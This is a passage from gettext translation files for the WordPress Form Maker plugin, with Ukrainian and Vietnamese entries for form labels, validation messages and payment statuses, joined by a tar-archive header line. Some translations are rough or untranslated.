#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Помилка, адреса електронної пошти не був відправлений."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Вашу адресу електронної пошти вже перевірений."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ваше повідомлення було успішно перевірено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Вашу адресу електронної пошти підтвердження минув."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Перевірка посилання є недійсним."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "поле обов'язкове для заповнення."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Це не адреса електронної пошти."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Ви не можете вибрати колишніх дати. Виберіть дату, починаючи з поточного."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Значення має бути між "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Кількість"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ваша оцінка повинна бути не менше "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Назва"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Перший"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Останній"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Середній"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Код зони"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Номер телефону:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Доларів. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Центів"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Від"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Для"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "перейти "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Скидання "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Виберіть поле "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Виберіть Дата"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-vi.po000060400000057455152434416630011634 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:06+0400\n"
"PO-Revision-Date: 2015-05-22 17:06+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: vi\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Địa chỉ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Địa chỉ Dòng 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Thành phố"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Tiểu Bang / Tỉnh / Vùng"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "· Mã bưu điện / mã ZIP"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Quốc gia"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Tháng một"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Tháng Hai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Tháng Ba"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Tháng Tư"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "May"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Tháng Sáu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Tháng Bảy"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Tháng Tám"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Tháng Chín"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Tháng Mười"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Tháng mười một"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Tháng mười hai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Lỗi, không chính xác Mã an."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "IP của bạn là danh sách đen. Xin vui lòng liên hệ với quản trị website"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Các tập tin vượt quá kích thước cho phép"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Xin lỗi, bạn không được phép để tải lên tập tin này."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Lỗi, tập tin không thể được di chuyển."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"%s lĩnh vực này đòi hỏi một mục độc đáo và giá trị này đã được đệ trình."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Lỗi, email đã được gửi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Không có gì đã được gửi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Hình thức của bạn đã được gửi thành công."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Lỗi, email đã được gửi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Địa chỉ email của bạn đã được xác minh."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Email của bạn đã được xác nhận thành công."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Xác minh email của bạn đã hết."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Liên kết xác minh là không hợp lệ."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "lĩnh vực được yêu cầu."

